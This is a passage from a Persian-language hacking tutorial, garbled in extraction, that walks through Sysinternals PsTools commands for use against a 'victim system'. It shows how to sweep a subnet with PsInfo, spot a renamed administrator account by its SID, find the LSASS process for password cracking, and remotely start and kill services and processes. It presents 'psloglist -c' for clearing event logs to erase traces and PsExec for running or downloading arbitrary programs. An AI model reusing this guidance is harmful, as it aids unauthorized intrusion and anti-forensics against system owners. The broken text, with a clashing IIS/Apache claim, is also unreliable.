‫ﺷﻤﺎ ﺏﺎ ایﻦ اﺏﺰار ﻣﯽ ﺕﻮاﻧﻴﺪ ﻓﺎیﻠﻬﺎی ﮐﻪ ﻣﺎﺷﻴﻨﯽ دارد از ﻣﺎﺷﻴﻦ دیﮕﺮ) هﻤﺎن ﻣﺎﺷﻴﻦ اﺟﺮا ﮐﻨﻨﺪﻩ دﺱﺘﻮر( اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ﺁﺷﮑﺎر ﻧﻤﻮد‪ .‬ﺏﻪ ﮔﻮﻧﻪ ایﯽ ﻣ ﯽ‬ ‫ﺷﻮد ﮔﻔﺖ ﮐﻪ اﻧﮕﺎر از ﻓﺮﻣﺎن ‪ Net file‬اﺱﺘﻔﺎدﻩ ﮐﺮدﻩ ایﺪ ‪ .‬ﺧﻮب ایﻦ اﺏﺰار ﺏ ﻪ درد ﻣ ﺪیﺮ ﺏﻴ ﺸﺘﺮ ﺏﺨ ﻮرد ﺕ ﺎ ﻣ ﺎ ﭼ ﻮن ﺏ ﺎ ﺁن ﻣ ﯽ ﺕﻮاﻧ ﺪ ﺟﻬ ﺖ اﺷ ﮑﺎل‬ ‫زدایﯽ در اﺷﺘﺮاک ﻓﺎیﻠﻬﺎ و رد یﺎﺏﯽ ﻏﻴﺮ ﻣﺠﺎز دﺱﺘﺮﺱﯽ هﺎ و‪ ...‬ﮐﺎرایﯽ دارد‪.‬‬ ‫ﺧﻮب ایﻦ یﮏ ﺏﺎر ﻣﻴﮕﻮیﻢ ﺏﺮای ﮐﻞ ایﻦ اﺏﺰارهﺎ ‪ .‬ﺕﻤﺎم ایﻦ اﺏﺰار هﺎ را ﻣﯽ ﺕﻮان ﺏﻪ ﺻﻮرت زیﺮ ﺏﺮای ﮐﺎر ﺏﺮد از راﻩ دور اﺱﺘﻔﺎدﻩ ﮐﺮد‪:‬‬ ‫‪\\RemotHost -u user name -p password‬‬ ‫اﺏﺰار ‪: PsLoggedOn‬‬ ‫اﺏﺰار ﺏﻌﺪی ﮐﻪ ﺁن هﻢ ﻓﻘﻂ اﻧﺪﮐﯽ ﺏﺪرد ﻣﺎ ﻣﻴﺨﻮرد اﺏﺰار ‪ PsLoggedOn‬اﺱﺖ ﮐﻪ ﮐﺎرش ایﻦ اﺱﺖ ﻟﻴﺴﺘﯽ از ﮐﺎر ﺏﺮاﻧﯽ را ﮐﻪ از ﻃﺮی ﻖ راﻩ دور‬ ‫ﺏﻪ یﮏ ﻣﻨﺒﻊ ﻣﺸﺘﺮک ﻣﺘﺼﻞ ﺷﺪﻩ اﻧﺪ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬از دیﺪ ﮔ ﺎﻩ ی ﮏ اﻧ ﺴﺎن ﺏ ﺪ راﻩ اﻧ ﺪاﺧﺘﻦ ی ﮏ ﺡﺮﮐ ﺖ ﺡﻤﻠ ﻪ ﮔﻮﻧ ﻪ از ﻣ ﺪل ﺱ ﺮریﺰی ﺏ ﺎﻓﺮ ﺏ ﻪ‬ ‫ﻣﺎﺷﻴﻨﯽ ﮐﻪ ﺕﻌﺪادی ﮐﺎرﺏﺮ ﺏﻪ ﺁن ﻣﺘﺼﻞ هﺴﺘﻨﺪ زیﺎد ﺟﺎﻟﺐ ﻧﺒﺎﺷﺪ ‪.‬‬ ‫اﺏﺰار ‪: Ps Get Sid‬‬ ‫اﺏﺰار ﺱﻮﻣﯽ ﮐﻪ ﻣﻦ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰار ‪ Ps Get Sid‬اﺱﺖ ﮐﻪ هﻤ ﺎﻧﻄﻮر ﮐ ﻪ از ﻧ ﺎم ﺁن ﻣﻴﻔﻬﻤﻴ ﺪ ﺏ ﻪ ﻣ ﺎ ﻣﻴﮕﻮی ﺪ ﮐ ﻪ ‪ SID‬ی ﮏ ﺡ ﺴﺎب ﮐ ﺎرﺏﺮ ﭼﻨ ﺪ‬ ‫اﺱﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ داﻧﺴﺘﻦ ایﻦ ﻣﻮﺽﻮع ﻣﻴﻔﻬﻤﻴﻢ ﮐﻪ ﻣﺜﻼ هﻤﻴﺸﻪ ﺡﺴﺎب ﻣﺪیﺮ ﺁﺧﺮ ‪ Sid‬ﻋﺪد ‪ ۵٠٠‬و ﺡﺴﺎب ﻣﻴﻬﻤﺎن ﻋ ﺪد ‪ ۵٠١‬اﺱ ﺖ ‪.‬در ﻧﺘﻴﺠ ﻪ دیﮕ ﺮ‬ ‫ﺏﺎ ﻋﻮض ﮐﺮدن ﻧﺎم ﺡﺴﺎب ﻣﺪیﺮ ﺏﻪ ﻣﻴﻬﻤﺎن ﻣﺎ ﮔﻮل ﻧﻤﯽ ﺧﻮریﻢ و ‪...‬‬ ‫‪C:\> psgetsid.exe \\ xxx.xxx.xxx.xxx -u Administrator -p‬‬ ‫ﺏﻌﺪ ایﻨﺠﻮری ﺟﻮاب ﻣﻴﺪهﺪ‪:‬‬ ‫‪IM! Secure ORC SID for xxx.xxx.xxx.xxx \\ OCR:‬‬ ‫‪S-1-5-21-145-4471165-484763869-1708537768-501‬‬ ‫ﺧﻮب ﺡﺎﻻ ﻣﺎ ﻣﻴﻔﻬﻤﻴﻢ ﮐﻪ ایﻦ ﺁﻗﺎی ﻣﺪیﺮ ﻧﺎم ﮐﺎرﺏﺮی ﺡﺴﺎب ﻣﻬﻤﺎن را ﻋﻮض ﮐﺮدﻩ و ﮔﺬاﺷﺘﻪ ﻣﺪیﺮ !!!!‬ ‫ﺧﻮب ایﻦ ﺏﮕﻮیﻢ ﮐﻪ ﻻزم ﻧﻴﺴﺖ ﺕ ﺎ در ﺧﻮاﺱ ﺖ ‪ SID‬در ﻣ ﻮرد ی ﮏ ﮐ ﺎرﺏﺮ ﺧ ﺎص اﻋﻤ ﺎل ﺷ ﻮد ای ﻦ ﺏﮕ ﻢ ﮐ ﻪ ﻣﻴﺘﻮاﻧ ﺪ ﺷﻨﺎﺱ ﻪ ﺱ ﺎیﺮ ﮐﺎرﺏﺮه ﺎی ی ﮏ‬ ‫ﺱﻴﺴﺘﻢ را هﻢ ﺏﺮﮔﺮداﻧﺪ‪.‬‬ ‫اﺏﺰار ‪: PsInfo‬‬ ‫اﺏﺰار) ‪ (۴‬ﭼﻬﺎرﻣﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ و ﺧﻴﻠﯽ هﻢ ﺧﻮب اﺱﺖ اﻣﺎ ﻓﻘﻂ ﺏﻪ ﺻﻮرت ﻣﺤﻠﯽ اﺟﺮا ﻣﻴﺸﻮﻧﺪ از راﻩ دور ﻣﺘﺎﺱﻔﺎﻧﻪ اﺏﺰار ‪ PsInfo‬اﺱﺖ ﮐﻪ‬ ‫ﮐﺎر ﺁن ﺷﻨﺎﺱﺎیﯽ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ریﺸﻪ اﺻﻠﯽ و ﻟﻴﺴﺖ ‪ Hot fix‬هﺎی ﻧﺼﺐ ﺷﺪﻩ و‪ ...‬را ﻣﻴﺪهﺪ ﺏﻪ ﻣﺎ‪.‬ﺧﻮب اﮔﺮ ﺷﻤﺎ ﺏﻪ ‪ Registry‬دﺱﺘﺮﺱﯽ از راﻩ‬ ‫دور داریﺪ ﻣﻴﺘﻮاﻧﻴﺪ از ﺷﺎﺧﻪ زیﺮ در ‪ Registry‬ﺏﻪ هﻤﻴﻦ اﻃﻼﻋﺎت دﺱﺖ یﺎﺏﻴﺪ ‪.‬‬ ‫‪HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix‬‬ ‫ﺧﻮب ﺏﺮای رﻓﻊ ﻋﻴﺐ ﻧﻪ ﭼﻨﺪان ﮐﻮﭼﮏ ایﻦ اﺏﺰار ﺏﺪرد ﺏﺨﻮر هﻢ یﮏ راﻩ اﺱﺖ و ﺁن هﻢ اﺱﺘﻔﺎدﻩ از دﺱﺘﻮر‪:‬‬ ‫‪C:\>for /L %I in (1, 1, 254) do PsInfo \\xxx.xxx.xxx.xxx.%i > systeminfo_xxx.xxx.xxx.xxx. %i.txt‬‬ ‫ﺕﻮﺟﻪ ﮐﻨﻴﺪ ایﻦ ﺏﭻ ﻓﺎیﻞ ﺏﺪون ﻧﺎم ﮐﺎرﺏﺮ و ﮐﻠﻤﻪ ﻋﺒﻮر اﺱﺖ ﮐﻪ ﺏﻬﺘ ﺮ اﺱ ﺖ ﺏ ﺮای ﺷ ﻤﺎ ه ﺎ ه ﻢ هﻤ ﻴﻦ ﺟ ﻮر ﺏﺎﺷ ﺪ و ﺡﺘﻤ ﺎ ﺁن را در ﻗﺎﻟ ﺐ ﮐ ﺎرﺏﺮی از‬ ‫ﺡﻮزﻩ ﻣﻮرد ﻧﻈﺮ اﺟﺮا ﮐﻨﻴﺪ ‪.‬‬ ‫اﺏﺰار ‪: PsService‬‬ ‫اﺏﺰار ) ‪ ( ۵‬ﭘﻨﺠﻢ ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﯽ ﮐﻨﻢ اﺏﺰار ‪ PsService‬اﺱﺖ ﮐﻪ ﮐﺎرش راﻩ اﻧ ﺪاﺧﺘﻦ و ﻣﺘﻮﻗ ﻒ ﮐ ﺮدن ﺱ ﺮویﺲ ه ﺎ و ﻧ ﺸﺎن دادن ﮐ ﻞ ﺱﺮوی ﺴﻬﺎی‬ ‫اﺟﺮا ﺷﺪﻩ ﻣﯽ ﺏﺎﺷﺪ ‪.‬ایﻦ اﺏﺰار ﺧﻴﻠﯽ ﺷﺒﻴﻪ دو ﻓﺮﻣﺎن ‪ Net Start‬و ‪ Net Stop‬اﺱﺖ‪.‬اﮔﺮ ای ﻦ اﺏ ﺰار را ﺕﻨﻬ ﺎ ﺏ ﺪون ه ﻴﭻ ﺱ ﻮیﭻ اﺟ ﺮا ﮐﻨﻴ ﺪ ﻟﻴ ﺴﺖ‬ ‫ﺕﻤﺎم ﺱﺮویﺲ هﺎ را ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ‪.‬‬ ‫ﺷﻤﺎ ﺏﺎ ﻓﺮﻣﺎن زیﺮ ﻣﯽ ﺕﻮاﻧﻴﺪ ﻣﺜﻼ ﺱﺮویﺴﯽ را روی یﮏ ﻣﺎﺷﻴﻦ از راﻩ دور ﺷﺮوع و یﺎ ﻣﺘﻮﻗﻒ ﮐﻨﻴﺪ‪:‬‬ ‫‪C :> psservice.exe \\xxx.xxx.xxx.xxx Start W3svc‬‬ ‫ﮐﻪ ایﻦ ﻓﺮﻣﺎن ﺱﺮویﺲ ‪ IIS‬را روی یﮏ ﺱﺮور ﺁﭘﺎﭼﯽ راﻩ ﻣﯽ اﻧﺪازد !!‬ ‫ﺱﻮیﭻ ‪ query‬اﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ وﺽﻌﻴﺖ ﺱﺮویﺲ در اﺧﺘﻴﺎر ﻣﺎ ﻣﻴﮕﺰارد ‪.‬‬ ‫ﺱﻮیﭻ ‪ Config‬اﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ ﺏﺮﻧﺎﻣﻪ ایﯽ ﮐﻪ ﺱﺮویﺲ ﻣﻮرد ﻧﻈﺮ در ﺡﺎل اﺟﺮای ان اﺱﺖ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ‪.‬‬ ‫ﺱﻮیﭻ ‪ Find‬ﺏﺮای ﺁﺷﮑﺎر ﮐﺮدن ﺱﺮویﺲ هﺎی در ﺡﺎل اﺟﺮا روی ﺷﺒﮑﻪ اﺱﺖ ‪.‬‬ ‫ﻣﺜﻼ ﺏﻪ ﻣﻨﻈﻮر ﮐﺸﻒ ﮐﺮدن ﻣﻴﺰﺏﺎن هﺎیﯽ از یﮏ ﺡﻮزﻩ ﺷ ﺒﮑﻪ ﮐ ﻪ ﺱ ﺮویﺲ ‪ Terminal Services‬را اﺟ ﺮا ﻣﻴﮑﻨﻨ ﺪ ﻣ ﯽ ﺕ ﻮان دﺱ ﺘﻮر را ایﻨﮕﻮﻧ ﻪ‬ ‫ﻧﻮﺷﺖ ‪.‬‬ ‫‪C :\> psservice.exe find termservice‬‬ ‫‪Found termservice.exe on:‬‬ ‫‪\\sun 1‬‬ ‫‪\\rostay 3‬‬ ‫ﺧﻮب ایﻦ ﺏﮕﻢ ﮐﻪ ﺷﻤﺎ ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﻧﺮم اﻓﺰار و یﮏ اﺱﮑﻨﺮ ﭘﻮرت ﻣﻴﺘﻮاﻧﻴﺪ ﺱﺮویﺴﻬﺎی ﻣﺴﺌﻠﻪ دار را ﮐﺸﻒ ﮐﻨﻴﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٥‬‬

‫اﺏﺰار ‪Pslist‬‬ ‫اﺏﺰار )‪ (۶‬ﺷﺸﻢ ﺧﻮب ﺏﺎ ایﻦ ﻣﻴﺘﻮاﻧﻴﺪ ﺡﺎل ﺁﻧﻬﺎیﯽ را ﮐﻪ ﺏﺎ داﺷﺘﻦ ﻟﻴﻨﻮﮐﺲ هﯽ ‪ ،‬ﭼﭗ ﻣﻴﺮﻧﺪ راﺱﺖ ﻣﻴﺮﻧﺪ و… ﺏ ﺮای ﺷ ﻤﺎ " ﻗﻤ ﭙﺾ " ﻣ ﯽ ﺕﺮﮐﺎﻧﺪﻧ ﺪ‬ ‫را ﺱﺮ ﺟﺎیﺸﺎن ﺏﻨﺸﺎﻧﯽ ﭘﺴﺮم‪ ) !!.‬ﺏﻠﻪ ایﻦ ﻣﻘﺎﻟﻪ را ﻓﻘﻂ ﺏﺮای ﭘﺴﺮهﺎ ﻧﻮﺷﺘﻢ (‬ ‫اﺱﻢ ایﻦ اﺏﺰار ‪ Pslist‬اﺱﺖ‪.‬‬ ‫ایﻦ اﺏﺰار ﺕﻮاﻧﺎیﯽ ﻟﻴﺴﺖ ﮐﺮدن ﻓﺮایﻨﺪ هﺎی ﻣﻮﺟﺪ ﺏﺮروی ﺱﻴﺴﺘﻢ ﻣﺤﻠﯽ یﺎ یﮏ ﺱﻴ ﺴﺘﻢ از راﻩ دور را دارا ﻣﻴﺒﺎﺷ ﺪ و ﺏ ﺎ اﺽ ﺎﻓﻪ ﮐ ﺮدن ﺱ ﻮیﭻ ه ﺎی ‪d‬‬ ‫و‪ m‬و‪ x‬ﺏﻪ ﺕﺮﺕﻴﺐ اﻃﻼﻋﺎت ﻣﺮﺏﻮط ﺏﻪ ‪ Thread‬هﺎ و ﺡﺎﻓﻈﻪ و یﺎ ﺕﺮﮐﻴﺒﯽ از ایﻦ دو را ﻧﻤﺎیﺶ دهﺪ‪.‬ایﻦ اﺏﺰار هﻢ ﻣﻴﺘﻮاﻧﺪ ﺏﻪ ﺻﻮرت ﮐﻠﯽ ) اﺟ ﺮای‬ ‫ﺧﺎﻟﯽ ‪ Pslist.exe‬در ﺧﻂ ﻓﺮﻣﺎن ( هﻤﻪ ﭘﺮوﺱﻪ هﺎ را ﻧﻤﺎیﺶ دهﺪ وه ﻢ ﻣﻴﺘﻮاﻧ ﺪ ی ﮏ ﭘﺮوﺱ ﻪ ﺧ ﺎص را ﺏ ﺎ ﺟﺰیﻴ ﺎت ﺏﻴ ﺸﺘﺮ ﻧﻤ ﺎیﺶ ده ﺪ ﻣ ﺜﻼ ﺏ ﻪ ای ﻦ‬ ‫ﺻﻮرت ‪:‬‬ ‫‪C :\> Pslist.exe iexplorer‬‬ ‫ﺷﻤﺎ ﺏﻪ ﺟﺎی ‪ iexplorer‬ﻣﻴﺘﻮاﻧﻴﺪ هﺮ ﭘﺮوﺱﻪ ای را ﮐﻪ دوﺱﺖ داریﺪ ﺏﻨﻮیﺴﻴﺪ‪.‬‬ ‫اﺱﺘﻔﺎدﻩ ایﻦ ﮔﻮﻧﻪ از اﺏﺰار ﺏﻴﺸﺘﺮ در ﻣﻮاﻗﻌﯽ ﮐﻪ ﺏﺨﻮاهﻴﻢ ﮐﻠﻤﻪ ﻋﺒﻮری را ﮐﺸﻒ ﮐﻨﻴﻢ ﻣﻮﺙﺮ اﺱﺖ زیﺮا ﺏﺎ اﺟ ﺮای ای ﻦ دﺱ ﺘﻮر دﺱ ﺖ ی ﺎﺏﯽ ﺏ ﻪ ﺷﻨﺎﺱ ﻪ‬ ‫ﻓﺮﺁیﻨﺪ ) یﺎ ‪ ( PID‬ﺏﺮﻧﺎﻣﻪ ‪ ) LSASS‬یﺎ هﺮ ﺏﺮﻧﺎﻣﻪ رﻣﺰﻧﮕﺎری دیﮕﺮ( ﺏﻪ راﺡﺘﯽ ﻣﻤﮑﻦ اﺱﺖ اﻟﺒﺘﻪ ای ﻦ اﺏ ﺰار در ای ﻦ زﻣﻴﻨ ﻪ ﻣ ﺎﻓﻮق دﮐﺘ ﺮا ﮔﺮﻓﺘ ﻪ‬ ‫اﺱﺖ از اﻧﺠﻤﻦ ﮐﺮﮐﺮ هﺎ !!!‬ ‫ﺱﻮیﭻ ‪ S‬در ایﻦ اﺏﺰار ایﻦ ﺏﺮﻧﺎﻣﻪ را ﺏﻪ ﺡﺎﻟﺖ ‪ Task Manager‬ﺏﺮدﻩ و ﺏﺮﻧﺎﻣﻪ داﺋﻤﺎ در ﺡﺎل ﻧﻮﺱ ﺎزی وﺽ ﻌﻴﺖ ﺱﻴ ﺴﺘﻢ ﺧﻮاه ﺪ ﺏ ﻮد )دﻗﻴﻘ ﺎ ﻣ ﺸﺎﺏﻪ‬ ‫ﻓﺮﻣﺎن ‪ tcp‬در ﻟﻴﻨﻮﮐﺲ اﺱﺖ ( ‪.‬‬ ‫ﺱﻮیﭻ ‪ R‬ﺕﻮاﻧﺎیﯽ ﻣﺸﺨﺺ ﮐﺮدن زﻣﺎن ﻧﻮﺱﺎزی اﻃﻼﻋﺎت را ﺏﺮﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ دارد ‪.‬‬ ‫ایﻦ دو ﺱﻮیﭻ واﻗﻌًﺎ در زﻣﻴﻨﻪ ﻣﺸﺎهﺪﻩ ﻓﻌﺎﻟﻴﺖ هﺎی ﺱﺮور ﻣﻔﻴﺪ هﺴﺘﻨﺪ ‪.‬ﺏﻪ ﻧﻤﻮﻧﻪ ایﯽ از ﮐﺎرﺏﺮد ایﻦ دوﺕﺎ ﺏﺎ هﻢ ﺕﻮﺟﻪ ﮐﻨﻴﺪ‪.‬‬ ‫‪C :\> Pslist.exe \\xxx.xxx.xxx.xxx s r 10 inetinfo.exe‬‬ ‫‪C :\> Pslist.exe s r 10 inetinfo.exe‬‬ ‫ﺧﻮب ﮐﻪ ایﻦ ﻓﺮﻣﺎن را روی ی ﮏ ﺱ ﺮو اﺟ ﺮا ﮐ ﺮدﻩ و در ﺟ ﻮاب ﺏ ﻪ ﻣ ﺎ ﻣﻴﮕﻮی ﺪ ‪ :‬ه ﺮ ‪ ١٠‬ﺙﺎﻧﻴ ﻪ ی ﮏ ﺏ ﺎر از ﺁﺧ ﺮیﻦ وﺽ ﻌﻴﺖ ﺱ ﺮویﺲ ‪ IIS‬ﺏ ﻪ ﻣ ﺎ‬ ‫اﻃﻼع ﻣﻴﺪهﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ T‬ﺏﺮﻧﺎﻣﻪ را ﻗﺎدر ﻣﻴﮑﻨﺪ ﻓﺮایﻨﺪ را ﺏﻪ هﻤﺮاﻩ ‪ Thread‬هﺎی ﻣﺮﺏﻮﻃﻪ در ﻗﺎﻟﺐ یﮏ ﺱﺎﺧﺘﺎر درﺧﺘﯽ ﻧﻤﺎیﺶ دهﺪ‪.‬ﺏ ﺎ ای ﻦ ﮐ ﺎر رواﺏ ﻂ ﻣﺮﺏ ﻮط ﺏ ﻪ‬ ‫اﺟﺮای یﮏ ﭘﺮوﺱﻪ را ﻣﻴﺘﻮان درک ﮐﺮد ‪.‬‬ ‫اﺏﺰار ‪: PsKill‬‬ ‫اﺏﺰار )‪ (٧‬هﻔﺘﻢ ﺏﺎ ﻧﺎم ‪ PsKill‬و یﺎ ‪ PsSuspend‬ﻗﺎدر اﺱﺖ ﮐﻪ یﮏ ﭘﺮوﺱﻪ را ﻧﺎﺏﻮد ﮐﻨﺪ و یﺎ ﺏﻪ ﺡﺎل ﺕﻌﻠﻴﻖ درﺁورد ‪.‬‬ ‫ﻣﺜﻼ‪:‬‬ ‫‪C :\> pskill.exe notepad‬‬ ‫‪2 processes named notepad killed.‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺘﻮاﻧﺪ ﺏﺎ دریﺎﻓﺖ ﺷﻨﺎﺱﻪ ﻓﺮایﻨﺪ ﻧﻴﺰ ایﻦ ﮐﺎر را اﻧﺠﺎم دهﺪ ﻣﺜﻞ‪:‬‬ ‫‪C :\> pskill.exe 1764‬‬ ‫‪Process #1764 killed‬‬ ‫ﺏﻬﺘﺮ اﺱﺖ ﺏﻪ ﺟﺎی ﻧﻮﺷﺘﻦ اﺱﻢ ﭘﺮوﺱﻪ ﻣﻮرد ﻧﻈﺮ ﺷﻨﺎﺱ ﻪ ﺁن را ﺏ ﻪ ﮐ ﺎر ﺏﺒﺮی ﺪ زی ﺮا هﻤﻴ ﺸﻪ اﺡﺘﻤ ﺎل ﻧ ﺎﺏﻮد ﺷ ﺪن ﭼﻨ ﺪ ﭘﺮوﺱ ﻪ دیﮕ ﺮ ه ﻢ اﺱ ﺖ ﭼ ﻮن‬ ‫ﻣﻌﻤﻮﻻ ﺏﻪ هﻢ رﺏﻂ دارد‪ .‬در ﻣﻮﻗﻊ ﺕﺎیﭗ ﺷﻨﺎﺱﻪ ﺏﺎیﺪ دﻗﺖ زیﺎدی ﮐﻨﻴﺪ ﮐﻪ اﺷﺘﺒﺎﻩ ﻧﮑﻨﻴﺪ و ﮔﺮﻧﻪ دیﮕﻪ هﻴﭽﯽ !!‬ ‫اﻟﺒﺘﻪ ﺏﺮای ﮐﺸﻒ ﺷﻨﺎﺱﻪ ﻓﺮایﻨﺪ ﻧﻴﺰ ﻣﻴﺘﻮاﻧﻴﺪ از ﻓﺮﻣﺎﻧﻬﺎی ﮐﻪ ﺏﺎﻻ ﮔﻔﺘﻢ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ وﻟﯽ یﮏ ﺏﺎر دیﮕﺮ هﻢ ﻣﻴﮕﻢ ﺏﺎ دﺱﺘﻮر زیﺮ ایﻦ ﮐﺎر را ﻣﯽ ﺕﻮاﻧﻴ ﺪ‬ ‫اﻧﺠﺎم دهﻴﺪ‪:‬‬ ‫‪C :\> Pslist.exe │ findstr / I notepad‬‬ ‫‪Notepad 1764 8 1 30 1728 0:00:00.020 0:00:00.020 0:00:07.077‬‬ ‫‪Notepad 1044 8 1 30 1724 0:00:00.020 0:00:00.020 0:00:07.077‬‬ ‫‪Notepad 1796 8 1 30 1728 0:00:00.010 0:00:00.020 0:00:03.4835‬‬ ‫ﻻزم اﺱﺖ ایﻦ ﻧﮑﺘﻪ را ﺏﮕﻮیﻢ دوﺏﺎر ﮐﻪ ایﻦ ﻓﺮایﻨﺪ ﺡﺬف یﮏ ﭘﺮوﺱﻪ ﺕﻤﺎم ﭘﺮوﺱﻪ هﺎی ﻣﺮﺏﻮط ﺏﺎ ﺁن را ﻧﻴﺰ ﺡﺬف ﻣﻴﮑﻨﺪ ﭘﺲ در اﺱﺘﻔﺎدﻩ از ایﻦ دﻗﺖ‬ ‫ﺏﻪ ﺧﺮج ﺏﺪهﻴﺪ یﺎ ایﻨﮑﻪ ﺷﻤﺎ واﻗﻌًﺎ ﻧﻴﺖ ﺕﺨﺮیﺐ داریﺪ!!!‬ ‫ﻓﺮﻣﺎن دیﮕﺮ ‪ PsSuspend‬اﺱﺖ و ﺏﺮای ﺕﻌﻠﻴﻖ یﮏ ﻓﺮایﻨﺪ اﺱﺖ و ﻣﺜﻞ ﻗﺒﻠﯽ اﺱﺖ ﺷﮑﻞ ﻧﻮﺷﺘﻦ دﺱﺘﻮر ﺁن و ﺏﺎ ﻧﻮﺷﺘﻦ هﻤﻴﻦ ﻓﺮﻣﺎن ﺏﻌﻼوﻩ ﺱ ﻮیﭻ ‪r‬‬ ‫ﻓﺮایﻨﺪ را دوﺏﺎرﻩ راﻩ ﻣﯽ اﻧﺪازد‪.‬‬ ‫ﺧﻮب ﻓﺮﻣﺎن ﺏﻌﺪی ﻓﺮﻣﺎن ‪ PsLogList‬اﺱﺖ ﮐﻪ دیﮕﻪ ایﻦ زیﺎد ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ ﭼﻮن دیﮕﻪ ‪ %٩٠‬ﺏﻪ درد ﻣﺪیﺮهﺎ ﻣﻴﺨﻮرد ﺕﺎ ﻣﺎ هﺎ‪.‬‬ ‫ﮐﻼ ایﻦ ﺏﺮای ﮐﻨﺎر ﮔﺬاﺷﺘﻦ ‪ Event Log Viewer‬اﺱﺖ و وﻗﺎیﻊ ﺡﻴﺎﺕﯽ را ﻧﺸﺎن ﻣﺎ ﻣﻴﺪهﺪ‪ .‬ﺏﺎ ایﻦ دﺱﺘﻮر ﻣﻴﺘﻮاﻧﻴﺪ رد ﭘﺎهﺎ را ﮐﻼ ﭘﺎک ﮐﻨﻴﺪ ‪:‬‬ ‫‪C :\> psloglist.exe –c‬‬ ‫ﮐﻪ ایﻦ ﮐﻼ ﻓﺎیﻞ ﺙﺒﺖ وﻗﺎیﻊ را ﭘﺎک ﻣﻴﮑﻨﺪ ﻣﺤﺘﻮیﺎت ﺁن را‪.‬اﻟﺒﺘﻪ ﺏﻪ ﺻﻮرت ریﺰ ﺕﺮ هﻢ ﻣﻴﺸﻮد اﺱﺘﻔﺎدﻩ ﮐﺮد ﻣﺜﻞ دﺱﺘﻮر زیﺮ ‪:‬‬ ‫‪C :\> psloglist.exe –c Application‬‬ ‫ﺧﻮب ایﻦ هﻢ ‪ %١٠‬ﮐﺎر ایﻦ ﻧﺮم اﻓﺰار ﮐﻪ ﺏﺪرد ﻣﺎ ﻣﯽ ﺧﻮرد )ایﻦ دﺱﺘﻮر هﻢ از راﻩ دور ﻣﻴﺘﻮان اﺱﺘﻔﺎدﻩ ﮐﺮد‪.‬اﻣﺎ ﺏﻪ ﺷﺮط هﺎ !!(‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٦‬‬

‫اﺏﺰار ‪: PsExec‬‬ ‫اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰار ‪ PsExec‬اﺱﺖ‪ .‬ایﻦ اﺏﺰار ﮐﺎر ﺏﺮدی ﺕﺮیﻦ اﺏﺰار ایﻦ ﻣﺠﻤﻮﻋﻪ اﺱﺖ ﺏﺪون اﻏﺮاق‪ .‬ﺏﺎ ایﻦ اﺏﺰار ﺷﻤﺎ ﻣ ﯽ ﺕﻮاﻧﻴ ﺪ‬ ‫یﮏ ﺏﺮﻧﺎﻣﻪ ) ﺏﺒﺨﺸﻴﺪ ! هﺮ ﺏﺮﻧﺎﻣﻪ ایﯽ ( را روی ﺱﻴﺴﺘﻢ ﻗﺮﺏﺎﻧﯽ ﺏﺎﻻ ﭘﺎیﻦ ﺏﮑﻨﻴﺪ ) ﻣﻨﻈﻮر راﻩ ﺏﻴﻨﺪازیﺪ !!(‪ .‬ﺧﻮب اﮔﺮ ﺏﺮﻧﺎﻣﻪ ﻣﻮرد ﻋﻼﻗﻪ ﻣﻦ ﺁﻧﺠ ﺎ‬ ‫ﻧﺒ ﻮد ﺡﺘ ﯽ اﺟ ﺎزﻩ ﺏ ﺎرﮔﻴﺮی ﺁن ) ‪ ( Download‬را ه ﻢ ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ !!! ﺏ ﺮ ﺧ ﻼف ﺱ ﺎیﺮ اﺏﺰاره ﺎ راﻩ دور هﻤﭽ ﻮن ﻓﺮﻣﺎﻧﻬ ﺎی ﻣﻌ ﺎدل ‪ rexec‬در‬ ‫ویﻨﺪوز ‪ ،‬در ﻣﻮرد ایﻦ اﺏﺰار ﻧﻴﺎزی ﺏﻪ ﻧﺼﺐ هﻴﭻ ﮔﻮﻧﻪ ﻓﺎیﻞ و یﺎ ‪ DLL‬ﺧﺎﺻﯽ ﻧﺪارد‪) .‬ﻓﺮﻣﺎن ‪ rexec‬یﮑﯽ از ﻓﺮﻣﺎﻧﻬﺎی ﻣﻬﻢ هﮑﺮهﺎ در ﻟﻴﻨ ﻮﮐﺲ‬ ‫اﺱﺖ ﮐﻪ ﺏﺎ ﺁن ﻣﻴﺘﻮان ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را " وادار " ﺏﻪ اﺟﺮای ﺏﺮﻧﺎﻣ ﻪ ﻣ ﻮر ﻧﻈ ﺮ ﻣ ﺎ ﮐ ﺮد ‪ ،‬ﺏ ﻪ هﻤ ﻴﻦ ﺧ ﺎﻃﺮ اﺱ ﺖ ﮐ ﻪ در ﭼﻨ ﺪ ﺱ ﻄﺮ ﺏ ﺎﻻ ﮔﻔ ﺘﻢ " ﺡ ﺎل‬ ‫ﺁﻧﻬﺎیﯽ را ﮐﻪ ﺏﺎ داﺷﺘﻦ 